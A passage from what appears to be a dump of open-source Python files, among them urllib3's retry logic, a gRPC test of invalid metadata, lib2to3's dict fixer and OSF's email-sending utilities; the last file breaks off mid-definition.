              FLOOR(CAST({col} AS TIMESTAMP) TO YEAR)) AS DATE)',
              'P0.25Y'),
        Grain('year', _('year'),
              'CAST(FLOOR(CAST({col} AS TIMESTAMP) TO YEAR) AS DATE)',
              'P1Y'),
    )

    @classmethod
    def convert_dttm(cls, target_type, dttm):
        """Return a Kylin SQL literal representing *dttm* as *target_type*."""
        tt = target_type.upper()
        if tt == 'DATE':
            return "CAST('{}' AS DATE)".format(dttm.isoformat()[:10])
        if tt == 'TIMESTAMP':
            return "CAST('{}' AS TIMESTAMP)".format(
                dttm.strftime('%Y-%m-%d %H:%M:%S'))
        return "'{}'".format(dttm.strftime('%Y-%m-%d %H:%M:%S'))
# Registry mapping engine name (e.g. 'presto') to its spec class, built by
# scanning this module for BaseEngineSpec subclasses.
engines = {
    spec.engine: spec
    for spec in globals().values()
    if inspect.isclass(spec) and issubclass(spec, BaseEngineSpec)
}
| apache-2.0 |
vrv/tensorflow | tensorflow/python/framework/op_def_registry.py | 196 | 1428 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Global registry for OpDefs."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.core.framework import op_def_pb2
# Global mapping of op name -> registered OpDef proto.
_registered_ops = {}


def register_op_list(op_list):
  """Register all the ops in an op_def_pb2.OpList."""
  if not isinstance(op_list, op_def_pb2.OpList):
    raise TypeError("%s is %s, not an op_def_pb2.OpList" %
                    (op_list, type(op_list)))
  for op_def in op_list.op:
    existing = _registered_ops.get(op_def.name)
    if existing is None:
      _registered_ops[op_def.name] = op_def
    else:
      # Re-registration is only allowed with an identical definition.
      assert existing == op_def


def get_registered_ops():
  """Returns a dictionary mapping names to OpDefs."""
  return _registered_ops
| apache-2.0 |
catapult-project/catapult | third_party/urllib3/urllib3/util/retry.py | 25 | 15150 | from __future__ import absolute_import
import time
import logging
from collections import namedtuple
from itertools import takewhile
import email
import re
from ..exceptions import (
ConnectTimeoutError,
MaxRetryError,
ProtocolError,
ReadTimeoutError,
ResponseError,
InvalidHeader,
)
from ..packages import six
log = logging.getLogger(__name__)
# Metadata recorded for each request attempt that resulted in a retry.
RequestHistory = namedtuple(
    'RequestHistory',
    ['method', 'url', 'error', 'status', 'redirect_location'],
)
class Retry(object):
""" Retry configuration.
Each retry attempt will create a new Retry object with updated values, so
they can be safely reused.
Retries can be defined as a default for a pool::
retries = Retry(connect=5, read=2, redirect=5)
http = PoolManager(retries=retries)
response = http.request('GET', 'http://example.com/')
Or per-request (which overrides the default for the pool)::
response = http.request('GET', 'http://example.com/', retries=Retry(10))
Retries can be disabled by passing ``False``::
response = http.request('GET', 'http://example.com/', retries=False)
Errors will be wrapped in :class:`~urllib3.exceptions.MaxRetryError` unless
retries are disabled, in which case the causing exception will be raised.
:param int total:
Total number of retries to allow. Takes precedence over other counts.
Set to ``None`` to remove this constraint and fall back on other
counts. It's a good idea to set this to some sensibly-high value to
account for unexpected edge cases and avoid infinite retry loops.
Set to ``0`` to fail on the first retry.
Set to ``False`` to disable and imply ``raise_on_redirect=False``.
:param int connect:
How many connection-related errors to retry on.
These are errors raised before the request is sent to the remote server,
which we assume has not triggered the server to process the request.
Set to ``0`` to fail on the first retry of this type.
:param int read:
How many times to retry on read errors.
These errors are raised after the request was sent to the server, so the
request may have side-effects.
Set to ``0`` to fail on the first retry of this type.
:param int redirect:
How many redirects to perform. Limit this to avoid infinite redirect
loops.
A redirect is a HTTP response with a status code 301, 302, 303, 307 or
308.
Set to ``0`` to fail on the first retry of this type.
Set to ``False`` to disable and imply ``raise_on_redirect=False``.
:param int status:
How many times to retry on bad status codes.
These are retries made on responses, where status code matches
``status_forcelist``.
Set to ``0`` to fail on the first retry of this type.
:param iterable method_whitelist:
Set of uppercased HTTP method verbs that we should retry on.
By default, we only retry on methods which are considered to be
idempotent (multiple requests with the same parameters end with the
same state). See :attr:`Retry.DEFAULT_METHOD_WHITELIST`.
Set to a ``False`` value to retry on any verb.
:param iterable status_forcelist:
A set of integer HTTP status codes that we should force a retry on.
A retry is initiated if the request method is in ``method_whitelist``
and the response status code is in ``status_forcelist``.
By default, this is disabled with ``None``.
:param float backoff_factor:
A backoff factor to apply between attempts after the second try
(most errors are resolved immediately by a second try without a
delay). urllib3 will sleep for::
{backoff factor} * (2 ** ({number of total retries} - 1))
seconds. If the backoff_factor is 0.1, then :func:`.sleep` will sleep
for [0.0s, 0.2s, 0.4s, ...] between retries. It will never be longer
than :attr:`Retry.BACKOFF_MAX`.
By default, backoff is disabled (set to 0).
:param bool raise_on_redirect: Whether, if the number of redirects is
exhausted, to raise a MaxRetryError, or to return a response with a
response code in the 3xx range.
:param bool raise_on_status: Similar meaning to ``raise_on_redirect``:
whether we should raise an exception, or return a response,
if status falls in ``status_forcelist`` range and retries have
been exhausted.
:param tuple history: The history of the request encountered during
each call to :meth:`~Retry.increment`. The list is in the order
the requests occurred. Each list item is of class :class:`RequestHistory`.
:param bool respect_retry_after_header:
Whether to respect Retry-After header on status codes defined as
:attr:`Retry.RETRY_AFTER_STATUS_CODES` or not.
:param iterable remove_headers_on_redirect:
Sequence of headers to remove from the request when a response
indicating a redirect is returned before firing off the redirected
request.
"""
DEFAULT_METHOD_WHITELIST = frozenset([
'HEAD', 'GET', 'PUT', 'DELETE', 'OPTIONS', 'TRACE'])
RETRY_AFTER_STATUS_CODES = frozenset([413, 429, 503])
DEFAULT_REDIRECT_HEADERS_BLACKLIST = frozenset(['Authorization'])
#: Maximum backoff time.
BACKOFF_MAX = 120
    def __init__(self, total=10, connect=None, read=None, redirect=None, status=None,
                 method_whitelist=DEFAULT_METHOD_WHITELIST, status_forcelist=None,
                 backoff_factor=0, raise_on_redirect=True, raise_on_status=True,
                 history=None, respect_retry_after_header=True,
                 remove_headers_on_redirect=DEFAULT_REDIRECT_HEADERS_BLACKLIST):
        """Initialize a retry configuration.

        See the class docstring for the meaning of every parameter; each
        counter may be an int, ``None`` (unlimited) or ``False`` (disabled).
        """
        self.total = total
        self.connect = connect
        self.read = read
        self.status = status

        # ``redirect=False`` (or ``total=False``) means: follow no redirects
        # and hand the 3xx response back to the caller instead of raising.
        if redirect is False or total is False:
            redirect = 0
            raise_on_redirect = False

        self.redirect = redirect
        self.status_forcelist = status_forcelist or set()
        self.method_whitelist = method_whitelist
        self.backoff_factor = backoff_factor
        self.raise_on_redirect = raise_on_redirect
        self.raise_on_status = raise_on_status
        self.history = history or tuple()
        self.respect_retry_after_header = respect_retry_after_header
        # Header matching is case-insensitive; normalize once at construction.
        self.remove_headers_on_redirect = frozenset([
            h.lower() for h in remove_headers_on_redirect])
def new(self, **kw):
params = dict(
total=self.total,
connect=self.connect, read=self.read, redirect=self.redirect, status=self.status,
method_whitelist=self.method_whitelist,
status_forcelist=self.status_forcelist,
backoff_factor=self.backoff_factor,
raise_on_redirect=self.raise_on_redirect,
raise_on_status=self.raise_on_status,
history=self.history,
remove_headers_on_redirect=self.remove_headers_on_redirect
)
params.update(kw)
return type(self)(**params)
@classmethod
def from_int(cls, retries, redirect=True, default=None):
""" Backwards-compatibility for the old retries format."""
if retries is None:
retries = default if default is not None else cls.DEFAULT
if isinstance(retries, Retry):
return retries
redirect = bool(redirect) and None
new_retries = cls(retries, redirect=redirect)
log.debug("Converted retries value: %r -> %r", retries, new_retries)
return new_retries
def get_backoff_time(self):
""" Formula for computing the current backoff
:rtype: float
"""
# We want to consider only the last consecutive errors sequence (Ignore redirects).
consecutive_errors_len = len(list(takewhile(lambda x: x.redirect_location is None,
reversed(self.history))))
if consecutive_errors_len <= 1:
return 0
backoff_value = self.backoff_factor * (2 ** (consecutive_errors_len - 1))
return min(self.BACKOFF_MAX, backoff_value)
def parse_retry_after(self, retry_after):
# Whitespace: https://tools.ietf.org/html/rfc7230#section-3.2.4
if re.match(r"^\s*[0-9]+\s*$", retry_after):
seconds = int(retry_after)
else:
retry_date_tuple = email.utils.parsedate(retry_after)
if retry_date_tuple is None:
raise InvalidHeader("Invalid Retry-After header: %s" % retry_after)
retry_date = time.mktime(retry_date_tuple)
seconds = retry_date - time.time()
if seconds < 0:
seconds = 0
return seconds
def get_retry_after(self, response):
""" Get the value of Retry-After in seconds. """
retry_after = response.getheader("Retry-After")
if retry_after is None:
return None
return self.parse_retry_after(retry_after)
def sleep_for_retry(self, response=None):
retry_after = self.get_retry_after(response)
if retry_after:
time.sleep(retry_after)
return True
return False
    def _sleep_backoff(self):
        # Sleep for the computed exponential-backoff interval; a non-positive
        # backoff (factor 0, or fewer than two consecutive errors) is a no-op.
        backoff = self.get_backoff_time()
        if backoff <= 0:
            return
        time.sleep(backoff)
def sleep(self, response=None):
""" Sleep between retry attempts.
This method will respect a server's ``Retry-After`` response header
and sleep the duration of the time requested. If that is not present, it
will use an exponential backoff. By default, the backoff factor is 0 and
this method will return immediately.
"""
if response:
slept = self.sleep_for_retry(response)
if slept:
return
self._sleep_backoff()
    def _is_connection_error(self, err):
        """ Errors when we're fairly sure that the server did not receive the
        request, so it should be safe to retry.
        """
        # Only a timeout during connection establishment qualifies; anything
        # later may already have reached the server.
        return isinstance(err, ConnectTimeoutError)
    def _is_read_error(self, err):
        """ Errors that occur after the request has been started, so we should
        assume that the server began processing it.
        """
        # Retrying these is only safe for idempotent methods — enforced by
        # the _is_method_retryable() check in increment().
        return isinstance(err, (ReadTimeoutError, ProtocolError))
def _is_method_retryable(self, method):
""" Checks if a given HTTP method should be retried upon, depending if
it is included on the method whitelist.
"""
if self.method_whitelist and method.upper() not in self.method_whitelist:
return False
return True
    def is_retry(self, method, status_code, has_retry_after=False):
        """ Is this method/status code retryable? (Based on whitelists and control
        variables such as the number of total retries to allow, whether to
        respect the Retry-After header, whether this header is present, and
        whether the returned status code is on the list of status codes to
        be retried upon on the presence of the aforementioned header)
        """
        if not self._is_method_retryable(method):
            return False

        # An explicit status_forcelist match always retries.
        if self.status_forcelist and status_code in self.status_forcelist:
            return True

        # NOTE: deliberately a chained ``and`` — when self.total is falsy
        # (0/None/False) that falsy value itself is returned, not False.
        return (self.total and self.respect_retry_after_header and
                has_retry_after and (status_code in self.RETRY_AFTER_STATUS_CODES))
def is_exhausted(self):
""" Are we out of retries? """
retry_counts = (self.total, self.connect, self.read, self.redirect, self.status)
retry_counts = list(filter(None, retry_counts))
if not retry_counts:
return False
return min(retry_counts) < 0
    def increment(self, method=None, url=None, response=None, error=None,
                  _pool=None, _stacktrace=None):
        """ Return a new Retry object with incremented retry counters.

        Exactly one category counter (connect/read/redirect/status) is
        decremented per call, chosen from *error*/*response*; ``total`` is
        always decremented. Raises instead of returning when the relevant
        counter is disabled or the new state is exhausted.

        :param response: A response object, or None, if the server did not
            return a response.
        :type response: :class:`~urllib3.response.HTTPResponse`
        :param Exception error: An error encountered during the request, or
            None if the response was received successfully.

        :return: A new ``Retry`` object.
        :raises MaxRetryError: when the incremented state is exhausted.
        """
        if self.total is False and error:
            # Disabled, indicate to re-raise the error.
            raise six.reraise(type(error), error, _stacktrace)

        total = self.total
        if total is not None:
            total -= 1

        # Work on local copies; self is immutable from the caller's view.
        connect = self.connect
        read = self.read
        redirect = self.redirect
        status_count = self.status
        cause = 'unknown'
        status = None
        redirect_location = None

        if error and self._is_connection_error(error):
            # Connect retry?
            if connect is False:
                raise six.reraise(type(error), error, _stacktrace)
            elif connect is not None:
                connect -= 1

        elif error and self._is_read_error(error):
            # Read retry?  Only safe when the method is retryable, since the
            # server may already have processed the request.
            if read is False or not self._is_method_retryable(method):
                raise six.reraise(type(error), error, _stacktrace)
            elif read is not None:
                read -= 1

        elif response and response.get_redirect_location():
            # Redirect retry?
            if redirect is not None:
                redirect -= 1
            cause = 'too many redirects'
            redirect_location = response.get_redirect_location()
            status = response.status

        else:
            # Incrementing because of a server error like a 500 in
            # status_forcelist and the given method is in the whitelist
            cause = ResponseError.GENERIC_ERROR
            if response and response.status:
                if status_count is not None:
                    status_count -= 1
                cause = ResponseError.SPECIFIC_ERROR.format(
                    status_code=response.status)
                status = response.status

        # Record this attempt so get_backoff_time() can count consecutive
        # errors and __repr__/debugging can show the request trail.
        history = self.history + (RequestHistory(method, url, error, status, redirect_location),)

        new_retry = self.new(
            total=total,
            connect=connect, read=read, redirect=redirect, status=status_count,
            history=history)

        if new_retry.is_exhausted():
            raise MaxRetryError(_pool, url, error or ResponseError(cause))

        log.debug("Incremented Retry for (url='%s'): %r", url, new_retry)

        return new_retry
    def __repr__(self):
        # Human-readable summary of the per-category retry budgets.
        return ('{cls.__name__}(total={self.total}, connect={self.connect}, '
                'read={self.read}, redirect={self.redirect}, status={self.status})').format(
            cls=type(self), self=self)
# For backwards compatibility (equivalent to pre-v1.9):
# module-level default used by from_int() when retries is None and no
# explicit default is supplied.
Retry.DEFAULT = Retry(3)
| bsd-3-clause |
ctiller/grpc | src/python/grpcio_tests/tests/unit/_invalid_metadata_test.py | 13 | 6271 | # Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test of RPCs made against gRPC Python's application-layer API."""
import unittest
import logging
import grpc
from tests.unit.framework.common import test_constants
# Toy (de)serializers exercising the custom-serialization hooks: requests are
# doubled on the wire and responses tripled, with the matching inverse on the
# receiving side. Named defs instead of assigned lambdas (PEP 8, E731).
def _SERIALIZE_REQUEST(bytestring):
    """Double the payload (toy request serializer)."""
    return bytestring * 2


def _DESERIALIZE_REQUEST(bytestring):
    """Keep the second half of the payload (inverse of the serializer)."""
    return bytestring[len(bytestring) // 2:]


def _SERIALIZE_RESPONSE(bytestring):
    """Triple the payload (toy response serializer)."""
    return bytestring * 3


def _DESERIALIZE_RESPONSE(bytestring):
    """Keep the first third of the payload (inverse of the serializer)."""
    return bytestring[:len(bytestring) // 3]


# Method paths for the four RPC cardinalities under test.
_UNARY_UNARY = '/test/UnaryUnary'
_UNARY_STREAM = '/test/UnaryStream'
_STREAM_UNARY = '/test/StreamUnary'
_STREAM_STREAM = '/test/StreamStream'
def _unary_unary_multi_callable(channel):
    # Unary-unary callable with no custom (de)serialization.
    return channel.unary_unary(_UNARY_UNARY)
def _unary_stream_multi_callable(channel):
    # Unary-stream callable wired with the toy request serializer and
    # response deserializer defined above.
    return channel.unary_stream(_UNARY_STREAM,
                                request_serializer=_SERIALIZE_REQUEST,
                                response_deserializer=_DESERIALIZE_RESPONSE)
def _stream_unary_multi_callable(channel):
    # Stream-unary callable wired with the toy request serializer and
    # response deserializer defined above.
    return channel.stream_unary(_STREAM_UNARY,
                                request_serializer=_SERIALIZE_REQUEST,
                                response_deserializer=_DESERIALIZE_RESPONSE)
def _stream_stream_multi_callable(channel):
    # Stream-stream callable with no custom (de)serialization.
    return channel.stream_stream(_STREAM_STREAM)
class InvalidMetadataTest(unittest.TestCase):
    """Verify that invalid metadata keys raise ValueError (with a useful
    message) for every RPC cardinality, before any wire activity occurs.

    The channel targets a dummy address; no server is needed because
    metadata validation happens client-side.
    """

    def setUp(self):
        self._channel = grpc.insecure_channel('localhost:8080')
        self._unary_unary = _unary_unary_multi_callable(self._channel)
        self._unary_stream = _unary_stream_multi_callable(self._channel)
        self._stream_unary = _stream_unary_multi_callable(self._channel)
        self._stream_stream = _stream_stream_multi_callable(self._channel)

    def tearDown(self):
        self._channel.close()

    def testUnaryRequestBlockingUnaryResponse(self):
        request = b'\x07\x08'
        metadata = (('InVaLiD', 'UnaryRequestBlockingUnaryResponse'),)
        expected_error_details = "metadata was invalid: %s" % metadata
        with self.assertRaises(ValueError) as exception_context:
            self._unary_unary(request, metadata=metadata)
        self.assertIn(expected_error_details, str(exception_context.exception))

    def testUnaryRequestBlockingUnaryResponseWithCall(self):
        request = b'\x07\x08'
        metadata = (('InVaLiD', 'UnaryRequestBlockingUnaryResponseWithCall'),)
        expected_error_details = "metadata was invalid: %s" % metadata
        with self.assertRaises(ValueError) as exception_context:
            self._unary_unary.with_call(request, metadata=metadata)
        self.assertIn(expected_error_details, str(exception_context.exception))

    def testUnaryRequestFutureUnaryResponse(self):
        request = b'\x07\x08'
        metadata = (('InVaLiD', 'UnaryRequestFutureUnaryResponse'),)
        expected_error_details = "metadata was invalid: %s" % metadata
        with self.assertRaises(ValueError) as exception_context:
            self._unary_unary.future(request, metadata=metadata)
        # Bug fix: this assertion was missing — the exception context was
        # captured but never checked, unlike every sibling test.
        self.assertIn(expected_error_details, str(exception_context.exception))

    def testUnaryRequestStreamResponse(self):
        request = b'\x37\x58'
        metadata = (('InVaLiD', 'UnaryRequestStreamResponse'),)
        expected_error_details = "metadata was invalid: %s" % metadata
        with self.assertRaises(ValueError) as exception_context:
            self._unary_stream(request, metadata=metadata)
        self.assertIn(expected_error_details, str(exception_context.exception))

    def testStreamRequestBlockingUnaryResponse(self):
        request_iterator = (
            b'\x07\x08' for _ in range(test_constants.STREAM_LENGTH))
        metadata = (('InVaLiD', 'StreamRequestBlockingUnaryResponse'),)
        expected_error_details = "metadata was invalid: %s" % metadata
        with self.assertRaises(ValueError) as exception_context:
            self._stream_unary(request_iterator, metadata=metadata)
        self.assertIn(expected_error_details, str(exception_context.exception))

    def testStreamRequestBlockingUnaryResponseWithCall(self):
        request_iterator = (
            b'\x07\x08' for _ in range(test_constants.STREAM_LENGTH))
        metadata = (('InVaLiD', 'StreamRequestBlockingUnaryResponseWithCall'),)
        expected_error_details = "metadata was invalid: %s" % metadata
        # NOTE(review): builds a fresh callable where sibling tests use
        # self._stream_unary; behavior is equivalent, kept as-is.
        multi_callable = _stream_unary_multi_callable(self._channel)
        with self.assertRaises(ValueError) as exception_context:
            multi_callable.with_call(request_iterator, metadata=metadata)
        self.assertIn(expected_error_details, str(exception_context.exception))

    def testStreamRequestFutureUnaryResponse(self):
        request_iterator = (
            b'\x07\x08' for _ in range(test_constants.STREAM_LENGTH))
        metadata = (('InVaLiD', 'StreamRequestFutureUnaryResponse'),)
        expected_error_details = "metadata was invalid: %s" % metadata
        with self.assertRaises(ValueError) as exception_context:
            self._stream_unary.future(request_iterator, metadata=metadata)
        self.assertIn(expected_error_details, str(exception_context.exception))

    def testStreamRequestStreamResponse(self):
        request_iterator = (
            b'\x07\x08' for _ in range(test_constants.STREAM_LENGTH))
        metadata = (('InVaLiD', 'StreamRequestStreamResponse'),)
        expected_error_details = "metadata was invalid: %s" % metadata
        with self.assertRaises(ValueError) as exception_context:
            self._stream_stream(request_iterator, metadata=metadata)
        self.assertIn(expected_error_details, str(exception_context.exception))

    def testInvalidMetadata(self):
        # Non-sequence metadata is rejected with TypeError, not ValueError.
        self.assertRaises(TypeError, self._unary_unary, b'', metadata=42)
if __name__ == '__main__':
    # Configure logging so client-side diagnostics are visible during the run.
    logging.basicConfig()
    unittest.main(verbosity=2)
| apache-2.0 |
PaulKinlan/cli-caniuse | site/app/scripts/bower_components/jsrepl-build/extern/python/closured/lib/python2.7/lib2to3/fixes/fix_dict.py | 326 | 3824 | # Copyright 2007 Google, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
"""Fixer for dict methods.
d.keys() -> list(d.keys())
d.items() -> list(d.items())
d.values() -> list(d.values())
d.iterkeys() -> iter(d.keys())
d.iteritems() -> iter(d.items())
d.itervalues() -> iter(d.values())
d.viewkeys() -> d.keys()
d.viewitems() -> d.items()
d.viewvalues() -> d.values()
Except in certain very specific contexts: the iter() can be dropped
when the context is list(), sorted(), iter() or for...in; the list()
can be dropped when the context is list() or sorted() (but not iter()
or for...in!). Special contexts that apply to both: list(), sorted(), tuple()
set(), any(), all(), sum().
Note: iter(d.keys()) could be written as iter(d) but since the
original d.iterkeys() was also redundant we don't fix this. And there
are (rare) contexts where it makes a difference (e.g. when passing it
as an argument to a function that introspects the argument).
"""
# Local imports
from .. import pytree
from .. import patcomp
from ..pgen2 import token
from .. import fixer_base
from ..fixer_util import Name, Call, LParen, RParen, ArgList, Dot
from .. import fixer_util
iter_exempt = fixer_util.consuming_calls | set(["iter"])
class FixDict(fixer_base.BaseFix):
    # Rewrites d.keys()/items()/values() and the iter*/view* variants for
    # Python 3 semantics, wrapping in list()/iter() unless the surrounding
    # context (see in_special_context) already consumes the view lazily.
    BM_compatible = True

    # Matches a power node ending in ``.<method>()`` with optional trailers
    # after the call (e.g. subscripts).
    PATTERN = """
    power< head=any+
         trailer< '.' method=('keys'|'items'|'values'|
                              'iterkeys'|'iteritems'|'itervalues'|
                              'viewkeys'|'viewitems'|'viewvalues') >
          parens=trailer< '(' ')' >
          tail=any*
    >
    """

    def transform(self, node, results):
        head = results["head"]
        method = results["method"][0]  # Extract node for method name
        tail = results["tail"]
        syms = self.syms
        method_name = method.value
        isiter = method_name.startswith(u"iter")
        isview = method_name.startswith(u"view")
        if isiter or isview:
            # Strip the "iter"/"view" prefix; Py3 keys/items/values are views.
            method_name = method_name[4:]
        assert method_name in (u"keys", u"items", u"values"), repr(method)
        # Clone so the original tree is left untouched until replacement.
        head = [n.clone() for n in head]
        tail = [n.clone() for n in tail]
        # ``special``: context already consumes the view, so no wrapper needed.
        special = not tail and self.in_special_context(node, isiter)
        args = head + [pytree.Node(syms.trailer,
                                   [Dot(),
                                    Name(method_name,
                                         prefix=method.prefix)]),
                       results["parens"].clone()]
        new = pytree.Node(syms.power, args)
        if not (special or isview):
            # Wrap: iter(...) for iter* methods, list(...) for plain ones.
            new.prefix = u""
            new = Call(Name(u"iter" if isiter else u"list"), [new])
        if tail:
            new = pytree.Node(syms.power, [new] + tail)
        new.prefix = node.prefix
        return new

    # Pattern for a call whose single argument is this node: func(node).
    P1 = "power< func=NAME trailer< '(' node=any ')' > any* >"
    p1 = patcomp.compile_pattern(P1)

    # Pattern for ``for ... in node`` (statement or comprehension).
    P2 = """for_stmt< 'for' any 'in' node=any ':' any* >
            | comp_for< 'for' any 'in' node=any any* >
         """
    p2 = patcomp.compile_pattern(P2)

    def in_special_context(self, node, isiter):
        # True when the enclosing context consumes the view directly and the
        # iter()/list() wrapper would be redundant.
        if node.parent is None:
            return False
        results = {}
        if (node.parent.parent is not None and
               self.p1.match(node.parent.parent, results) and
               results["node"] is node):
            if isiter:
                # iter(d.iterkeys()) -> iter(d.keys()), etc.
                return results["func"].value in iter_exempt
            else:
                # list(d.keys()) -> list(d.keys()), etc.
                return results["func"].value in fixer_util.consuming_calls
        if not isiter:
            return False
        # for ... in d.iterkeys() -> for ... in d.keys(), etc.
        return self.p2.match(node.parent, results) and results["node"] is node
| apache-2.0 |
javazquez/vertx-web | src/test/sockjs-protocol/venv/lib/python2.7/site-packages/linecache2/tests/inspect_fodder2.py | 17 | 1585 | # line 1
def wrap(foo=None):
def wrapper(func):
return func
return wrapper
# line 7
def replace(func):
def insteadfunc():
print('hello')
return insteadfunc
# line 13
@wrap()
@wrap(wrap)
def wrapped():
pass
# line 19
@replace
def gone():
pass
# line 24
oll = lambda m: m
# line 27
tll = lambda g: g and \
g and \
g
# line 32
tlli = lambda d: d and \
d
# line 36
def onelinefunc(): pass
# line 39
def manyargs(arg1, arg2,
arg3, arg4): pass
# line 43
def twolinefunc(m): return m and \
m
# line 47
a = [None,
lambda x: x,
None]
# line 52
def setfunc(func):
globals()["anonymous"] = func
setfunc(lambda x, y: x*y)
# line 57
def with_comment(): # hello
world
# line 61
multiline_sig = [
lambda x, \
y: x+y,
None,
]
# line 68
def func69():
class cls70:
def func71():
pass
return cls70
extra74 = 74
# line 76
def func77(): pass
(extra78, stuff78) = 'xy'
extra79 = 'stop'
# line 81
class cls82:
def func83(): pass
(extra84, stuff84) = 'xy'
extra85 = 'stop'
# line 87
def func88():
# comment
return 90
# line 92
def f():
class X:
def g():
"doc"
return 42
return X
method_in_dynamic_class = f().g
#line 101
def keyworded(*arg1, arg2=1):
pass
#line 105
def annotated(arg1: list):
pass
#line 109
def keyword_only_arg(*, arg):
pass
from functools import wraps
def decorator(func):
@wraps(func)
def fake():
return 42
return fake
#line 121
@decorator
def real():
return 20
| apache-2.0 |
HalcyonChimera/osf.io | website/mails/mails.py | 1 | 13197 | # -*- coding: utf-8 -*-
"""OSF mailing utilities.
Email templates go in website/templates/emails
Templates must end in ``.txt.mako`` for plaintext emails or``.html.mako`` for html emails.
You can then create a `Mail` object given the basename of the template and
the email subject. ::
CONFIRM_EMAIL = Mail(tpl_prefix='confirm', subject="Confirm your email address")
You can then use ``send_mail`` to send the email.
Usage: ::
from website import mails
...
mails.send_mail('foo@bar.com', mails.CONFIRM_EMAIL, user=user)
"""
import os
import logging
import waffle
from mako.lookup import TemplateLookup, Template
from framework.email import tasks
from osf import features
from website import settings
logger = logging.getLogger(__name__)

# All email templates live under website/templates/emails.
EMAIL_TEMPLATES_DIR = os.path.join(settings.TEMPLATES_PATH, 'emails')

_tpl_lookup = TemplateLookup(
    directories=[EMAIL_TEMPLATES_DIR],
)

# Suffix appended to a Mail's tpl_prefix to locate its HTML template.
HTML_EXT = '.html.mako'

# Template prefixes of mails that are disabled.
# NOTE(review): not referenced anywhere in this module — presumably consumed
# elsewhere; verify before removing.
DISABLED_MAILS = [
    'welcome',
    'welcome_osf4i'
]
class Mail(object):
    """A renderable email definition.

    :param str tpl_prefix: basename of the template under the email
        templates directory (the ``.html.mako`` suffix is appended).
    :param str subject: mako template string for the subject line.
    :param iterable categories: categories attached via SendGrid's SMTPAPI,
        used for email analytics.
        See https://sendgrid.com/docs/User_Guide/Statistics/categories.html
    :param bool engagement: whether this is an engagement email that can be
        disabled with the disable_engagement_emails waffle flag.
    """

    def __init__(self, tpl_prefix, subject, categories=None, engagement=False):
        self.tpl_prefix = tpl_prefix
        self._subject = subject
        self.categories = categories
        self.engagement = engagement

    def html(self, **context):
        """Render and return the HTML body for this mail."""
        return render_message(self.tpl_prefix + HTML_EXT, **context)

    def subject(self, **context):
        """Render and return the subject line for this mail."""
        return Template(self._subject).render(**context)
def render_message(tpl_name, **context):
    """Look up *tpl_name* in the email template directory and render it
    with *context*."""
    return _tpl_lookup.get_template(tpl_name).render(**context)
def send_mail(
        to_addr, mail, mimetype='html', from_addr=None, mailer=None, celery=True,
        username=None, password=None, callback=None, attachment_name=None,
        attachment_content=None, **context):
    """Send an email from the OSF.
    Example: ::

        from website import mails

        mails.send_email('foo@bar.com', mails.TEST, name="Foo")

    :param str to_addr: The recipient's email address
    :param Mail mail: The mail object
    :param str mimetype: Either 'plain' or 'html'
    :param str from_addr: Sender address; defaults to settings.FROM_EMAIL
    :param mailer: Callable (or celery task) doing the actual send;
        defaults to tasks.send_email
    :param bool celery: If False, send synchronously even when celery is on
    :param username: Optional SMTP credentials passed through to the mailer
    :param password: Optional SMTP credentials passed through to the mailer
    :param function callback: celery task to execute after send_mail completes
    :param attachment_name: Optional attachment passed through to the mailer
    :param attachment_content: Optional attachment passed through to the mailer
    :param **context: Context vars for the message template

    :return: mailer result / async result, False when suppressed by the
        engagement-email switch, or None when settings.USE_EMAIL is off.

    .. note:
         Uses celery if available
    """
    # Engagement mails can be globally suppressed by a waffle switch.
    if waffle.switch_is_active(features.DISABLE_ENGAGEMENT_EMAILS) and mail.engagement:
        return False

    from_addr = from_addr or settings.FROM_EMAIL
    mailer = mailer or tasks.send_email
    subject = mail.subject(**context)
    message = mail.html(**context)
    # Don't use ttls and login in DEBUG_MODE
    ttls = login = not settings.DEBUG_MODE
    logger.debug('Sending email...')
    logger.debug(u'To: {to_addr}\nFrom: {from_addr}\nSubject: {subject}\nMessage: {message}'.format(**locals()))

    kwargs = dict(
        from_addr=from_addr,
        to_addr=to_addr,
        subject=subject,
        message=message,
        mimetype=mimetype,
        ttls=ttls,
        login=login,
        username=username,
        password=password,
        categories=mail.categories,
        attachment_name=attachment_name,
        attachment_content=attachment_content,
    )

    logger.debug('Preparing to send...')
    if settings.USE_EMAIL:
        if settings.USE_CELERY and celery:
            logger.debug('Sending via celery...')
            return mailer.apply_async(kwargs=kwargs, link=callback)
        else:
            logger.debug('Sending without celery')
            ret = mailer(**kwargs)
            if callback:
                callback()

            return ret
def get_english_article(word):
    """Return the English indefinite article ('a' or 'an') for *word*.

    :param word: the word immediately after the article
    :return: 'an' when *word* begins with a vowel letter, otherwise 'a'
    """
    return 'an' if word[0].lower() in 'aeiou' else 'a'
# Predefined Emails
TEST = Mail('test', subject='A test email to ${name}', categories=['test'])
# Emails for first-time login through external identity providers.
EXTERNAL_LOGIN_CONFIRM_EMAIL_CREATE = Mail(
'external_confirm_create',
subject='OSF Account Verification'
)
FORK_COMPLETED = Mail(
'fork_completed',
subject='Your fork has completed'
)
FORK_FAILED = Mail(
'fork_failed',
subject='Your fork has failed'
)
EXTERNAL_LOGIN_CONFIRM_EMAIL_LINK = Mail(
'external_confirm_link',
subject='OSF Account Verification'
)
EXTERNAL_LOGIN_LINK_SUCCESS = Mail(
'external_confirm_success',
subject='OSF Account Verification Success'
)
# Sign up confirmation emails for OSF, native campaigns and branded campaigns
INITIAL_CONFIRM_EMAIL = Mail(
'initial_confirm',
subject='OSF Account Verification'
)
CONFIRM_EMAIL = Mail(
'confirm',
subject='Add a new email to your OSF account'
)
CONFIRM_EMAIL_PREREG = Mail(
